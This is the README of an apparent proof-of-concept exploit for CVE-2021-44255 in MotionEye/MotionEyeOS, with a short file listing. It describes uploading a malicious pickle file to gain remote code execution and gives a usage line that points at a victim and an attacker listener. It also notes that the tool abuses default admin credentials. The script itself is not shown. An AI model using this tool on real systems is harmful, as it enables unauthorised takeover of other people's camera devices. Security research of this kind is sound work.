A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. CVE-2021-44255# MotionEye/MotionEyeOS Authenticated RCE
A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator credentials, so it should not be that big of a deal. Unfortunately, MotionEye/MotionEyeOS can frequently be found running with default credentials.
Example:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
Where victim and attacker are in the form of ip:port, unless it is port 80. Then, the port can be excluded. This uses the default username of admin with a blank password. There are also CLI options for alternate usernames/passwords. Please see the code for more details.
CVE-2021-44255
See https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye for a writeup on this and other issues.
[4.0K] /data/pocs/c56c0f1726870c926296af2ce30ff8edec1c5387
├── [5.1K] main.py
└── [ 774] README.md
0 directories, 2 files